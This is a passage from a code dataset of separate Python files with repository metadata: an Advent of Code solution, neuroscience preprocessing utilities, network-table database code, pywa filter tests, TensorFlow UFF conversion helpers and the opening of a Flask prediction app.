2\nnoop\nnoop\nnoop\naddx 8\nnoop\naddx -1\naddx 2\naddx 1\nnoop\naddx 17\naddx -9\naddx 1\naddx 1\naddx -3\naddx 11\nnoop\nnoop\naddx 1\nnoop\naddx 1\nnoop\nnoop\naddx -13\naddx -19\naddx 1\naddx 3\naddx 26\naddx -30\naddx 12\naddx -1\naddx 3\naddx 1\nnoop\nnoop\nnoop\naddx -9\naddx 18\naddx 1\naddx 2\nnoop\nnoop\naddx 9\nnoop\nnoop\nnoop\naddx -1\naddx 2\naddx -37\naddx 1\naddx 3\nnoop\naddx 15\naddx -21\naddx 22\naddx -6\naddx 1\nnoop\naddx 2\naddx 1\nnoop\naddx -10\nnoop\nnoop\naddx 20\naddx 1\naddx 2\naddx 2\naddx -6\naddx -11\nnoop\nnoop\nnoop\"\"\"\n\ndef get_cycle_actions(input:Any) -> int:\n register={1:1}\n current_cycle = 1\n for op in input:\n if len(op.split(' ')) == 1:\n current_cycle += 1\n register[current_cycle]=0 #noop\n else:\n current_cycle += 1\n register[current_cycle]=0\n current_cycle += 1\n register[current_cycle]=int(op.split(' ')[1])\n return register\n\ndef get_sprite_position(register:dict) -> dict:\n sprite_positions = {}\n for current_key, current_val in register.items():\n sprite_center = sum([v for (k,v) in register.items() if k <= current_key])\n sprite_positions[current_key-1] = list(range(sprite_center-1,sprite_center+2))\n return sprite_positions\n \ndef print_screen(sprite_positions:dict):\n screen = [\n [],\n [],\n [],\n [],\n [],\n [],\n []\n ]\n for cycle, position in sprite_positions.items():\n screen[cycle//40].append('#' if cycle%40 in position else '.')\n lines = [''.join(x) for x in screen[:6]]\n picture = '\\n'.join(lines)\n print(picture)\n\nif __name__ == '__main__':\n zip_data = lambda cycles,register: [(c,register) for c in cycles]\n cycle_signal_strength = lambda data: sum([v for (k,v) in data[1].items() if k <= data[0]]) * data[0]\n \n # Test Case\n 
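# register maps cycle -> delta taking effect on that cycle (register[1] = 1\n    # is the initial X value), so X during cycle c is the sum of all deltas\n    # with key <= c, and the signal strength is that sum times c.\n    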
test_output = get_cycle_actions(test_input.split('\\n'))\n cycles = [20,60,100,140,180,220]\n assert 13140 == sum(list(map(cycle_signal_strength,zip_data(cycles,test_output))))\n\n # Part A\n d = get_data(day=10, year=2022)\n register_a = get_cycle_actions(d.split('\\n'))\n a = sum(list(map(cycle_signal_strength,zip_data(cycles,register_a))))\n\n submit(a, part=\"a\", day=10, year=2022)\n \n # Part B\n print_screen(get_sprite_position(test_output)) # Test Print to screen for input data\n \"\"\"\n ##..##..##..##..##..##..##..##..##..##..\n ###...###...###...###...###...###...###.\n ####....####....####....####....####....\n #####.....#####.....#####.....#####.....\n ######......######......######......####\n #######.......#######.......#######.....\n \"\"\"\n\n sprite_positions = get_sprite_position(register_a)\n print_screen(sprite_positions)\n \"\"\"\n ###...##..#..#.####..##..#....#..#..##..\n #..#.#..#.#..#.#....#..#.#....#..#.#..#.\n #..#.#....####.###..#....#....#..#.#....\n ###..#.##.#..#.#....#.##.#....#..#.#.##.\n #....#..#.#..#.#....#..#.#....#..#.#..#.\n #.....###.#..#.#.....###.####..##...###.\n \"\"\"\n\n","repo_name":"M-Barrows/AdventofCode","sub_path":"2022/python/Day_10.py","file_name":"Day_10.py","file_ext":"py","file_size_in_byte":3592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11611087229","text":"\"\"\"this file deals with preprocessing, such as creating delay line, whitening\"\"\"\n\nimport numpy as np\n\n\ndef _prepare_stimulus_one_delay(stimulus_flat, delay, truncate_pars):\n assert stimulus_flat.ndim > 1\n assert abs(delay) < stimulus_flat.shape[0]\n filler = np.zeros((abs(delay),) + stimulus_flat.shape[1:], dtype=stimulus_flat.dtype)\n if delay > 0:\n # see the past; remove last delay elements\n result = np.concatenate([filler, stimulus_flat[:(-delay)]], axis=0)\n else:\n # see the future; remove first (-delay)\n result = np.concatenate([stimulus_flat[(-delay):], filler], axis=0)\n # then let's truncate.\n result = _truncate_array(result, truncate_pars)\n assert not np.may_share_memory(result, stimulus_flat)\n return result\n\n\ndef flatten_stimulus_list(stimulus_list):\n \"\"\"make stimulus data all 2D for each trial\"\"\"\n return [stimulus_this.reshape(stimulus_this.shape[0], -1) for stimulus_this in stimulus_list]\n\n\ndef _prepare_stimulus_all_delays_one_trial(stimulus_flat, delays, truncate_pars):\n assert stimulus_flat.ndim == 2\n return np.concatenate([_prepare_stimulus_one_delay(stimulus_flat, d, truncate_pars) for d in delays], axis=1)\n\n\ndef prepare_stimulus_all_delays_all_trials(flat_stimulus_list, delays, truncate_pars=(0, 0)):\n return [_prepare_stimulus_all_delays_one_trial(stimulus_flat, delays, truncate_pars) for\n stimulus_flat in flat_stimulus_list]\n\n\ndef _truncate_array(arr, truncate_config):\n arr_old_shape = arr.shape\n truncate_before, truncate_after = truncate_config\n assert truncate_before >= 0 and truncate_after >= 0\n assert truncate_before + truncate_after < len(arr) # at least you need to keep something.\n if truncate_before > 0:\n arr = arr[truncate_before:]\n if truncate_after > 0:\n arr = arr[:-truncate_after]\n assert arr.shape == (arr_old_shape[0] - (truncate_before + truncate_after),) + arr_old_shape[1:]\n\n return arr\n\n\ndef check_input(stimulus_list, response_list):\n \"\"\"check all input is good\n\n :param stimulus_list: an iterable of trials, each of shape T_i x [S], where T_i is number of time bins for trial i,\n and [S] is the shape of stimulus.\n 
:param response_list: an iterable of responses, each of shape T_i x M, where M is number of neurons.\n :return: a tuple of the following 4 elements:\n list version of stimulus_list\n list version of response_list\n shape of stimulus (a tuple)\n number of neurons\n \"\"\"\n n_trial = len(stimulus_list)\n assert n_trial == len(response_list) and n_trial >= 1\n stimulus_list_good = []\n response_list_good = []\n\n kernel_shape_first = None\n neuron_number_first = None\n for t, (stimulus, response) in enumerate(zip(stimulus_list, response_list)):\n stimulus_good, response_good, kernel_shape, neuron_number = _check_input_one(stimulus,\n response)\n if kernel_shape_first is None and neuron_number_first is None:\n kernel_shape_first = kernel_shape\n neuron_number_first = neuron_number\n else:\n assert kernel_shape_first == kernel_shape and neuron_number_first == neuron_number\n stimulus_list_good.append(stimulus)\n response_list_good.append(response)\n\n return stimulus_list_good, response_list_good, kernel_shape_first, neuron_number_first\n\n\ndef reshape_kernel(kernels_recovered, stim_shape, num_delay, num_neuron, multiple_kernel_per_neuron=False):\n assert np.all(np.asarray(stim_shape) > 0) and num_delay > 0\n num_kernel_element = num_delay * np.prod(np.asarray(stim_shape))\n assert num_neuron > 0 and num_kernel_element > 0\n if multiple_kernel_per_neuron:\n a, b, c = kernels_recovered.shape\n assert b > 0\n new_shape = (num_neuron, b, num_delay) + stim_shape\n else:\n a, c = kernels_recovered.shape\n new_shape = (num_neuron, num_delay) + stim_shape\n assert (a, c) == (num_neuron, num_kernel_element)\n\n return np.reshape(kernels_recovered, new_shape)\n\n\ndef _check_input_one(stimulus, response):\n # for maximum precision, some many procedures only give double output.\n stimulus = np.asarray(stimulus)\n response = np.asarray(response)\n assert stimulus.ndim > 1 and response.ndim == 2\n assert stimulus.shape[0] == response.shape[0]\n assert stimulus.size > 0 and response.size > 0\n ret = stimulus, response\n ret = ret + (stimulus.shape[1:],)\n ret = ret + (response.shape[1],)\n return ret\n\n\ndef cov_matrix(stim):\n n, d = stim.shape\n assert n > 1 and d > 1 # when D is 1, returned might be a scalar...\n # compute covariance matrix\n # notice that while np.cov would subtract the mean, you should do it yourself when passing stim into STA and STC.\n # this norms data by N-1\n cov = np.cov(stim, rowvar=False)\n assert cov.shape == (d, d)\n return cov\n","repo_name":"chris-warner-II/Cell_Assembly_Codebase","sub_path":"python_code/utils/strflab/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":4973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16668220140","text":"import pandas as pd\r\nfrom model.model_db import *\r\nfrom datetime import datetime \r\nfrom pprint import pprint as pp \r\nimport json\r\n\r\n \r\ndef save_arp_table(device_ip, df_table):\r\n ''' Push received device arp table to database'''\r\n with Session() as session:\r\n # arp_objects = []\r\n try:\r\n for index, row in df_table.iterrows():\r\n arp_row = ArpTable(\r\n mac_address = row['mac_address'],\r\n ip_address = row['ip_address'],\r\n interface_name = row['interface_name'],\r\n ip_source = device_ip,\r\n date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\r\n )\r\n session.merge(arp_row)\r\n # print(arp_row)\r\n session.commit()\r\n except Exception as e:\r\n print(\"EXCEPTION on save_arp_table => \", e)\r\n \r\n 
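# note: exiting the 'with Session()' block already closes the session,\r\n        # so this explicit close() is redundant but harmless\r\n        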
session.close()\r\n\r\ndef save_ethernet_switching_table(device_ip, df_table):\r\n    ''' Push received device ethernet-switching table to database'''\r\n    with Session() as session:\r\n        try:\r\n            es_objects = []\r\n            for index, row in df_table.iterrows():\r\n                es_row = EthernetSwitchingTable(\r\n                    mac_address = row['mac_address'],\r\n                    vlan = row['vlan_name'],\r\n                    logical_interface = row['logical_interface'],\r\n                    ip_source = device_ip,\r\n                    date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\r\n                )\r\n                session.merge(es_row)\r\n                # print(es_row)\r\n            session.commit()\r\n            \r\n        except Exception as e:\r\n            print(\"EXCEPTION on save_ethernet_switching_table => \", e)\r\n        \r\n        session.close()\r\n\r\n\r\ndef save_interfaces_table(device_ip, in_table):\r\n    ''' Push received device interfaces table to database'''\r\n    with Session() as session:\r\n        try:\r\n            for index, row in in_table.iterrows():\r\n                in_row = InterfacesTable(\r\n                    interface = row['interface'],\r\n                    description = row['description'],\r\n                    ip_source = device_ip,\r\n                    date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\r\n                )\r\n                session.merge(in_row)\r\n                # print(in_row)\r\n            session.commit()\r\n\r\n        except Exception as e:\r\n            print(\"EXCEPTION on save_interfaces_table => \", e)\r\n\r\n        session.close()\r\n\r\ndef save_neighbors_table(device_ip, ne_table):\r\n    ''' Push received device neighbors table to database'''\r\n    with Session() as session:\r\n        try:\r\n            for index, row in ne_table.iterrows():\r\n                in_row = NeighborsTable(\r\n                    local_interface = row['local_interface'],\r\n                    device_id = row['device_id'],\r\n                    port_info = row['port_info'],\r\n                    ip_source = device_ip,\r\n                    date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\r\n                )\r\n                session.merge(in_row)\r\n                # print(in_row)\r\n            session.commit()\r\n\r\n        except Exception as e:\r\n            print(\"EXCEPTION on save_neighbors_table => \", e)\r\n\r\n        session.close()\r\n\r\ndef get_transit_interfaces():\r\n    ''' Returns transit interfaces table '''\r\n    result = []\r\n    with Session() as session:\r\n        # the query selects the vendor's name column directly, so each row\r\n        # unpacks to plain values rather than ORM objects\r\n        for row_id, description, vendor_name in session.query(TransitInterfaces.id, TransitInterfaces.description, DeviceVendors.name)\\\r\n            .join(DeviceVendors).filter(DeviceVendors.id == TransitInterfaces.vendor).all():\r\n            data = {\r\n                'id': row_id,\r\n                'transit_interface': description,\r\n                'vendor': vendor_name,\r\n            }\r\n            result.append(data)\r\n    return result\r\n\r\ndef transit_interfaces_controller(new_int, delete_int, edit_int):\r\n    response = \"\"\r\n    with Session() as session:\r\n        if(new_int):\r\n            response += \"Added: \"\r\n            for i in new_int:\r\n                int_to_add = TransitInterfaces(\r\n                    description = i['transit_interface'].lower(),\r\n                    vendor = VendorEnum[ i['vendor'] ].value\r\n                )\r\n                session.merge(int_to_add)\r\n                response += str(i) + \";\"\r\n            session.commit()\r\n        if(delete_int):\r\n            response += \"Deleted: \"\r\n            for i in delete_int:\r\n                session.query(TransitInterfaces).filter(TransitInterfaces.id == i['id']).delete()\r\n                response += str(i) + \";\"\r\n            session.commit()\r\n        if(edit_int):\r\n            response += \"Modified: \"\r\n            for i in edit_int:\r\n                iface = session.query(TransitInterfaces).filter(TransitInterfaces.id == i['id']).first()\r\n                iface.description = i['transit_interface'].lower()\r\n                iface.vendor = VendorEnum[i['vendor']].value\r\n                response += str(i) + \";\"\r\n            session.commit()\r\n        session.close()\r\n    return response","repo_name":"psitadmin/network-junco","sub_path":"server/arp_service/arp_db.py","file_name":"arp_db.py","file_ext":"py","file_size_in_byte":5104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"27564718647","text":"'''\n16. Write a program that solves the following problem: a “xerox” copy costs R$ 0.25 per sheet, but over 100 sheets this value drops to R$ 0.20 per unit. Given the total number of copies, inform the amount to be paid.\n'''\n\ncopias = int(input(\"Enter the number of copies: \"))\n\nxerox = copias * 0.25\n\nif copias > 100: \n    xerox = 0.20 * copias\n\nprint(f\"The amount to be paid will be R${(round(xerox, 2))}\")\n","repo_name":"Vitfpx/Python","sub_path":"Ex_college/Ex16.py","file_name":"Ex16.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"784095537","text":"from __future__ import annotations\n\nimport os\nfrom typing import Any\n\nfrom lsst.cm.tools.core.db_interface import DbInterface\nfrom lsst.cm.tools.core.utils import LevelEnum, StatusEnum\nfrom lsst.cm.tools.db.entry_handler import GenericEntryHandler\nfrom lsst.cm.tools.db.group import Group\nfrom lsst.cm.tools.db.handler_utils import rollback_jobs\nfrom lsst.cm.tools.db.workflow import Workflow\n\n\nclass WorkflowHandler(GenericEntryHandler):\n    \"\"\"Campaign level callback handler\n\n    Provides interface functions.\n    \"\"\"\n\n    config_block = \"workflow\"\n\n    fullname_template = os.path.join(\n        \"{production_name}\",\n        \"{campaign_name}\",\n        \"{step_name}\",\n        \"{group_name}\",\n        \"w{workflow_idx:02}\",\n    )\n\n    level = LevelEnum.workflow\n\n    def insert(self, dbi: DbInterface, parent: Group, **kwargs: Any) -> Workflow:\n        kwcopy = kwargs.copy()\n        workflow_idx = len(parent.w_)\n        kwcopy[\"workflow_idx\"] = workflow_idx\n        insert_fields = dict(\n            name=f\"{workflow_idx:02}\",\n            fullname=self.get_fullname(**kwcopy),\n            p_id=parent.p_.id,\n            c_id=parent.c_.id,\n            s_id=parent.s_.id,\n            g_id=parent.id,\n            idx=workflow_idx,\n            config_id=parent.config_id,\n            frag_id=self._fragment_id,\n            coll_in=parent.coll_in,\n            coll_out=parent.coll_out,\n            bps_yaml_template=self.get_config_var(\"bps_yaml_template\", parent.bps_yaml_template, **kwcopy),\n            bps_script_template=self.get_config_var(\n                \"bps_script_template\", parent.bps_script_template, **kwcopy\n            ),\n            pipeline_yaml=self.get_config_var(\"pipeline_yaml\", parent.pipeline_yaml, **kwcopy),\n            lsst_version=self.get_config_var(\"lsst_version\", parent.lsst_version, **kwcopy),\n            lsst_custom_setup=self.get_config_var(\"lsst_custom_setup\", parent.lsst_custom_setup, **kwcopy),\n            data_query=kwcopy.get(\"data_query\", parent.data_query),\n            status=StatusEnum.waiting,\n        )\n        workflow = Workflow.insert_values(dbi, **insert_fields)\n        return workflow\n\n    def requeue_job(self, dbi: DbInterface, entry: Any, job_name: str = \"job\") -> None:\n        job_handler = entry.get_sub_handler(job_name)\n        job_handler.insert(\n            dbi,\n            entry,\n            name=job_name,\n        )\n\n    def _make_jobs(self, dbi: DbInterface, entry: Any) -> StatusEnum:\n        job_handler = entry.get_sub_handler(self.config.get(\"job_config\", \"job\"))\n        job_handler.insert(\n            dbi,\n            entry,\n            name=\"job\",\n        )\n        return StatusEnum.ready\n\n    def make_children(self, dbi: DbInterface, entry: Workflow) -> StatusEnum:\n        return StatusEnum.populating\n\n    def supersede_hook(self, dbi: DbInterface, entry: Any, purge: bool = False) -> None:\n        rollback_jobs(dbi, entry, purge)\n","repo_name":"lsst-dm/cm_tools","sub_path":"src/lsst/cm/tools/db/workflow_handler.py","file_name":"workflow_handler.py","file_ext":"py","file_size_in_byte":2905,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"21004449029","text":"import dataclasses\nimport random\nfrom typing import Callable, TypeVar\n\nfrom pywa import filters as fil, WhatsApp\nfrom pywa.errors import WhatsAppError, MediaUploadError\nfrom pywa.types import (\n Message,\n CallbackSelection,\n CallbackButton,\n MessageStatus,\n TemplateStatus,\n)\nfrom pywa.types.base_update import BaseUpdate\nfrom tests.common import UPDATES, API_VERSIONS, WA_NO_FILTERS\n\n_T = TypeVar(\"_T\", bound=BaseUpdate)\n\n\ndef same(x: _T) -> _T:\n return x\n\n\n# {filename: {test_name: [(update_modifier, filter_func)]}}\n\nFILTERS: dict[\n str, dict[str, list[tuple[Callable[[_T], _T], Callable[[WhatsApp, _T], bool]]]]\n] = {\n \"message\": {\n \"text\": [\n (same, fil.text),\n (lambda m: modify_text(m, \"hello\"), fil.text.matches(\"hello\")),\n (\n lambda m: modify_text(m, \"hello\"),\n fil.text.matches(\"hello\", ignore_case=True),\n ),\n (lambda m: modify_text(m, \"hi hello\"), fil.text.contains(\"hello\")),\n (\n lambda m: modify_text(m, \"hi Hello\"),\n fil.text.contains(\"hello\", \"Hi\", ignore_case=True),\n ),\n (\n lambda m: modify_text(m, \"hi bye\"),\n fil.text.startswith(\"hi\"),\n ),\n (\n lambda m: modify_text(m, \"hi bye\"),\n fil.text.startswith(\"Hi\", ignore_case=True),\n ),\n (\n lambda m: modify_text(m, \"hi bye\"),\n fil.text.endswith(\"bye\"),\n ),\n (\n lambda m: modify_text(m, \"hi bye\"),\n fil.text.endswith(\"Bye\", ignore_case=True),\n ),\n (\n lambda m: modify_text(m, \"hi bye\"),\n fil.text.regex(r\"^hi\", r\"bye$\"),\n ),\n (\n lambda m: modify_text(m, \"abcdefg\"),\n fil.text.length((5, 10)),\n ),\n (\n lambda m: modify_text(m, \"!start\"),\n fil.text.command(\"start\"),\n ),\n (\n lambda m: modify_text(m, \"/start\"),\n fil.text.command(\"start\", prefixes=\"!/\"),\n ),\n (\n lambda m: modify_text(m, \"!Start\"),\n fil.text.command(\"staRt\", ignore_case=True),\n ),\n (\n lambda m: modify_text(m, \"!start\"),\n fil.text.is_command,\n ),\n ],\n \"image\": [\n (same, fil.image),\n (lambda m: add_caption(m), fil.image.has_caption),\n (\n lambda m: modify_img_mime_type(m, \"image/jpeg\"),\n fil.image.mimetypes(\"image/jpeg\"),\n ),\n ],\n \"video\": [\n (same, fil.video),\n (lambda m: add_caption(m), fil.video.has_caption),\n ],\n \"document\": [\n (same, fil.document),\n (lambda m: add_caption(m), fil.document.has_caption),\n ],\n \"audio\": [\n (same, fil.audio.audio),\n ],\n \"voice\": [\n (same, fil.audio.voice),\n ],\n \"static_sticker\": [\n (same, fil.sticker.static),\n ],\n \"animated_sticker\": [\n (same, fil.sticker.animated),\n ],\n \"reaction\": [\n (same, fil.reaction.added),\n (\n lambda m: modify_reaction(m, \"😀\"),\n fil.reaction.emojis(\"😀\"),\n ),\n ],\n \"unreaction_empty\": [\n (same, fil.reaction.removed),\n ],\n \"unreaction_no_emoji\": [(same, fil.reaction.removed)],\n \"current_location\": [\n (same, fil.location.current_location),\n (\n lambda m: modify_location(m, 37.4611794, -122.2531785),\n fil.location.in_radius(37.47, -122.25, 10),\n ),\n ],\n \"chosen_location\": [(same, fil.not_(fil.location.current_location))],\n \"contacts\": [\n (same, fil.contacts),\n (\n lambda m: add_wa_number_to_contact(m),\n fil.contacts.has_wa,\n ),\n (\n lambda m: keep_only_one_contact(m),\n fil.contacts.count(min_count=1, max_count=1),\n ),\n (\n lambda m: modify_contact_phone(m, \"123456789\"),\n fil.contacts.phones(\"+123456789\"),\n ),\n ],\n \"order\": [\n (same, fil.order),\n (\n lambda m: modify_order_price(m, 100, 3),\n fil.order.price(min_price=100, max_price=400),\n ),\n (\n lambda m: 
modify_order_products_count(m, 3),\n fil.order.count(min_count=2, max_count=5),\n ),\n (\n lambda m: modify_order_product_sku(m, \"SKU123\"),\n fil.order.has_product(\"SKU123\"),\n ),\n ],\n \"unsupported\": [(same, fil.unsupported)],\n \"reply\": [(same, fil.reply)],\n \"forwarded\": [(same, fil.forwarded)],\n \"forwarded_many_times\": [(same, fil.forwarded)],\n \"interactive_message_with_err\": [],\n },\n \"callback_button\": {\n \"button\": [\n (\n lambda m: modify_callback_data(m, \"hi\"),\n fil.callback.data_matches(\"hi\"),\n ),\n (\n lambda m: modify_callback_data(m, \"Hi\"),\n fil.callback.data_matches(\"hi\", ignore_case=True),\n ),\n (\n lambda m: modify_callback_data(m, \"hi bye\"),\n fil.callback.data_contains(\"hi\"),\n ),\n (\n lambda m: modify_callback_data(m, \"hi bye\"),\n fil.callback.data_contains(\"Hi\", ignore_case=True),\n ),\n (\n lambda m: modify_callback_data(m, \"hi bye\"),\n fil.callback.data_startswith(\"hi\"),\n ),\n (\n lambda m: modify_callback_data(m, \"hi bye\"),\n fil.callback.data_startswith(\"Hi\", ignore_case=True),\n ),\n (\n lambda m: modify_callback_data(m, \"hi bye\"),\n fil.callback.data_endswith(\"bye\"),\n ),\n (\n lambda m: modify_callback_data(m, \"hi bye\"),\n fil.callback.data_endswith(\"Bye\", ignore_case=True),\n ),\n (\n lambda m: modify_callback_data(m, \"data:123\"),\n fil.callback.data_regex(\"^data:\", r\"\\d{3}$\"),\n ),\n ],\n \"quick_reply\": [],\n },\n \"callback_selection\": {\n \"callback\": [],\n \"description\": [],\n },\n \"message_status\": {\n \"sent\": [(same, fil.message_status.sent)],\n \"failed\": [\n (\n lambda m: modify_status_err(\n m, WhatsAppError.from_dict({\"code\": 131053, \"message\": \"error\"})\n ),\n fil.message_status.failed_with(MediaUploadError),\n ),\n (\n lambda m: modify_status_err(\n m, WhatsAppError.from_dict({\"code\": 131053, \"message\": \"error\"})\n ),\n fil.message_status.failed_with(131053),\n ),\n ],\n },\n \"template_status\": {\n \"approved\": [\n (same, fil.template_status.on_event(TemplateStatus.TemplateEvent.APPROVED))\n ],\n },\n \"flow_completion\": {\"completion\": []},\n}\n\nRANDOM_API_VER = random.choice(API_VERSIONS)\n\n\ndef test_combinations():\n assert fil.all_(lambda _, __: True, lambda _, __: True)\n assert fil.any_(lambda _, __: True, lambda _, __: False)\n assert fil.not_(lambda _, __: False)\n\n\ndef test_filters():\n for filename, tests in UPDATES[RANDOM_API_VER].items():\n for test in tests:\n for test_name, update in test.items():\n for update_modifier, filter_func in FILTERS[filename][test_name]:\n update = update_modifier(update)\n try:\n assert filter_func(WA_NO_FILTERS, update)\n except AssertionError as e:\n raise AssertionError(\n f\"Test {filename}/{test_name} failed on {update}\"\n ) from e\n\n\ndef modify_text(msg: Message, to: str):\n return dataclasses.replace(msg, text=to)\n\n\ndef add_caption(msg: Message):\n return dataclasses.replace(msg, caption=\"Caption\")\n\n\ndef modify_img_mime_type(msg: Message, mime_type: str):\n return dataclasses.replace(\n msg, image=dataclasses.replace(msg.image, mime_type=mime_type)\n )\n\n\ndef modify_reaction(msg: Message, emoji: str | None):\n return dataclasses.replace(\n msg, reaction=dataclasses.replace(msg.reaction, emoji=emoji)\n )\n\n\ndef modify_location(msg: Message, lat: float, lon: float):\n return dataclasses.replace(\n msg, location=dataclasses.replace(msg.location, latitude=lat, longitude=lon)\n )\n\n\ndef modify_contact_phone(msg: Message, phone: str):\n return dataclasses.replace(\n msg,\n contacts=(\n 
dataclasses.replace(\n                msg.contacts[0],\n                phones=[dataclasses.replace(msg.contacts[0].phones[0], phone=phone)],\n            ),\n        ),\n    )\n\n\ndef add_wa_number_to_contact(msg: Message):\n    return dataclasses.replace(\n        msg,\n        contacts=(\n            dataclasses.replace(\n                msg.contacts[0],\n                phones=[\n                    dataclasses.replace(msg.contacts[0].phones[0], wa_id=\"123456789\")\n                ],\n            ),\n        ),\n    )\n\n\ndef keep_only_one_contact(msg: Message):\n    return dataclasses.replace(msg, contacts=msg.contacts[:1])\n\n\ndef modify_order_price(msg: Message, price: int, quantity: int):\n    return dataclasses.replace(\n        msg,\n        order=dataclasses.replace(\n            msg.order,\n            products=[\n                dataclasses.replace(\n                    msg.order.products[0], price=price, quantity=quantity\n                )\n            ],\n        ),\n    )\n\n\ndef modify_order_products_count(msg: Message, count: int):\n    return dataclasses.replace(\n        msg,\n        order=dataclasses.replace(\n            msg.order,\n            products=[msg.order.products[0] for _ in range(count)],\n        ),\n    )\n\n\ndef modify_order_product_sku(msg: Message, sku: str):\n    return dataclasses.replace(\n        msg,\n        order=dataclasses.replace(\n            msg.order,\n            products=[dataclasses.replace(msg.order.products[0], sku=sku)],\n        ),\n    )\n\n\ndef modify_callback_data(clb: CallbackButton | CallbackSelection, data: str):\n    return dataclasses.replace(clb, data=data)\n\n\ndef modify_status_err(status: MessageStatus, err: WhatsAppError):\n    return dataclasses.replace(status, error=err)\n","repo_name":"david-lev/pywa","sub_path":"tests/test_filters.py","file_name":"test_filters.py","file_ext":"py","file_size_in_byte":10861,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"37"}
+{"seq_id":"11711061237","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport tensorflow as tf\nimport uff\nfrom tensorflow.python.tools import freeze_graph\n\n\ndef load_graph(frozen_graph):\n    \"\"\"Load the model from a file into a GraphDef/Graph object\n\n    Args:\n        frozen_graph: The serialization of a GraphDef model in a file such as *.pbtxt or *.pb\n\n    Returns:\n        None\n    \"\"\"\n\n    with tf.gfile.GFile(frozen_graph, \"rb\") as f:\n        graph_def = tf.GraphDef()\n        graph_def.ParseFromString(f.read())\n\n    # with on prefix name\n    with tf.Graph().as_default() as graph:\n        tf.import_graph_def(graph_def, name=\"\")\n    return graph\n\n\ndef write_model_graph(sess, dest_path='/tmp', output_model_graph_name='model_graph.pbtxt'):\n    \"\"\"Write the model's GraphDef into a file\n\n    This model file doesn't contain variable data.\n\n    Args:\n        sess: Session object\n        dest_path: The destination path of the output file\n        output_model_graph_name: The name of the output file\n\n    Returns:\n        None\n    \"\"\"\n\n    tf.train.write_graph(sess.graph, dest_path, output_model_graph_name)\n\n\ndef do_freeze_graph(input_graph_path, checkpoint_path, output_node_names_str, dest_path='/tmp',\n                    output_frozen_graph_name='frozen_graph.pb', input_binary=False):\n    \"\"\" A wrapper function around API:freeze_graph.freeze_graph() to generate a frozen model file (*.pb).\n\n    This function leverages API:freeze_graph.freeze_graph() and is easier to use.\n    The function doesn't contain any optimization approach inside it.\n\n    Args:\n        input_graph_path: The serialization of a GraphDef in a file, such as *.pbtxt or *.pb\n        checkpoint_path: The check-point path that contains the variables data\n        output_node_names_str: The comma-separated list of output operation names. 
\n for instance: \n \"fasterrcnn/rcnn/rcnn_proposal_1/GatherV2_161,\n fasterrcnn/rcnn/fc_bbox/add,fasterrcnn/rcnn/fc_classifier/add,\n fasterrcnn/rcnn/rcnn_proposal_1/TopKV2\"\n dest_path: The destination path of the output UFF file\n output_frozen_graph_name: The name of the frozen graph file\n input_binary: The graph from input_graph_path is binary format or not\n\n Returns:\n None\n \"\"\"\n\n input_saver_def_path = \"\"\n restore_op_name = \"\"\n filename_tensor_name = \"\"\n output_optimized_graph_name = \"\"\n clear_devices = True\n\n freeze_graph.freeze_graph(input_graph_path, input_saver_def_path,\n input_binary, checkpoint_path, output_node_names_str,\n restore_op_name, filename_tensor_name,\n os.path.join(dest_path, output_frozen_graph_name),\n clear_devices, \"\")\n\n\ndef convert_uff_from_tensorflow(sess, graph_def, model_output, dest_path='/tmp', dest_name='converted.uff'):\n \"\"\"Convert Session GraphDef from TensorFlow to UFF format model\n \n This function is for converting directly from TensorFlow's Session GraphDef and Session object. \n The session should be built with graph and the variables are also restored from check-point files already.\n\n Args:\n sess: Session object\n graph: GraphDef object is from either pbtxt file or Python's model source code \n dest_path: The destination path of the output UFF file\n dest_name: The name of the UFF file\n\n Returns:\n None\n \"\"\"\n frozen_graph = tf.graph_util.convert_variables_to_constants(sess, graph_def, model_output)\n frozen_graph = tf.graph_util.remove_training_nodes(frozen_graph)\n #Create UFF model and dump it on disk\n uff_model = uff.from_tensorflow(frozen_graph, model_output)\n dump = open(os.path.join(dest_path, dest_name), 'wb')\n dump.write(uff_model)\n dump.close()\n\n\ndef convert_uff_from_frozen_model(frozen_graph, model_output, dest_path='/tmp', dest_name='converted.uff'):\n \"\"\"Convert the frozen model file to UFF format model\n\n This function is for converting directly from frozen model file which is done by freeze_graph(). 
\n So this frozen file will contains the serialization of GraphDef and Variables data in const value.\n\n Args:\n frozen_graph: The frozen model file (*.pb)\n dest_path: The destination path of the output UFF file\n dest_name: The name of the UFF file\n\n Returns:\n None\n \"\"\"\n\n uff_model = uff.from_tensorflow_frozen_model(frozen_graph, model_output)\n dump = open(os.path.join(dest_path, dest_name), 'wb')\n dump.write(uff_model)\n dump.close()\n\n\n","repo_name":"myelintek/gui-project","sub_path":"code/myelindl/core/utils/uff_converter.py","file_name":"uff_converter.py","file_ext":"py","file_size_in_byte":4465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2400470895","text":"import joblib\nimport numpy as np\nimport pandas as pd\nfrom flask import Blueprint, render_template, request, redirect, url_for, flash\nfrom flask_login import current_user, login_required, login_user\nfrom flask_security import logout_user\nfrom werkzeug.security import check_password_hash\nfrom models.user import User\nfrom extensions import db, login_manager, bcrypt\nimport pickle\nimport numpy as np\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nimport warnings\n\n# warnings.filterwarnings(\"ignore\")\n\nfilename = 'diabetes-prediction-rfc-model.pkl'\nclassifier = pickle.load(open(filename, 'rb'))\nmodel = pickle.load(open('model.pkl', 'rb'))\nmodel1 = pickle.load(open('model1.pkl', 'rb'))\nmain = Blueprint('main', __name__, static_folder='../static', template_folder='../templates')\n\n\ndef get_user(user_id):\n user = 